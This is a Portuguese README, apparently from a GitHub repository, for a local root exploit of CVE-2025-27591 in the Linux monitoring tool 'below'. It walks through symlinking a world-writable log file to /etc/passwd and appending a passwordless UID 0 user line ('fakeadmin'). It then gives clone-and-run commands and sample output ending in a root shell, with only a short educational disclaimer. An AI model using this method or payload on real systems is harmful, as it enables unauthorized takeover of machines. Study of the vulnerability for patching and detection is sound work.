
🔥 Exploração de Escalação de Privilégio Local para CVE-2025-27591 | Abusa do diretório de logs gravável globalmente no Below para obter root via injeção em /etc/passwd
below🛑 Aviso: Este exploit é fornecido apenas para fins educacionais e testes de segurança autorizados. O uso não autorizado pode ser ilegal.
below é uma ferramenta de monitoramento de desempenho desenvolvida pelo Facebook para sistemas Linux. Versões do below anteriores a uma versão corrigida são afetadas por uma vulnerabilidade crítica que permite que usuários não privilegiados escalem para root explorando diretórios de log graváveis por qualquer usuário e manipulação não sanitizada de logs.
Este script Bash realiza o seguinte:
Verificação de Diretório Gravável por Qualquer Usuário:
/var/log/below é gravável por qualquer usuário (um sinal vermelho).Preparação do Ataque de Symlink:
error_root.log existente (se houver) e cria um link simbólico para /etc/passwd.Construção do Payload:
/etc/passwd:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
Disparo do Log:
sudo below record para forçar o binário vulnerável a escrever logs.Obtenção de Acesso Root:
su fakeadmin para obter um shell root sem solicitação de senha.CVE-2025-27591/
├── exploit.sh
├── README.md
Antes de executar o exploit, certifique-se de ter o seguinte:
/usr/bin/below/var/log/belowsudo para executar: sudo below recordln (para criar symlinks)su (para trocar de usuário)timeout (para controlar o tempo de execução)whoami (para verificar privilégios)# 1. Clone o repositório
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. Torne o script executável
chmod +x exploit.sh
# 3. Execute o exploit
./exploit.sh
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd
[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)
[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.
[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
| Campo | Valor |
|---|
| CVE-ID | CVE-2025-27591 |
| Severidade | 🔥 Crítico (CVSS ≈ 7.8 - 8.8) |
| Vetor de Ataque | Local |
| Impacto | Escalação de Privilégio para root (UID=0) |
| Tipo de Exploit | Abuso de Symlink / Injeção em Arquivo de Log |
| Aplicação Afetada | below – normalmente instalado como /usr/bin/below |
| Causa Raiz | Escritas inseguras em arquivos em /var/log/below/ sem verificações de permissão |